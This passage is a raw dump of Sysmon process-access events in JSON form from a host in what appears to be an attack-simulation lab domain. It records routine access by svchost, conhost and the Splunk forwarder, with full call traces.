C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.168\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4412\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.168","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","SourceProcessId":"4376","SourceThreadId":"4412","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program 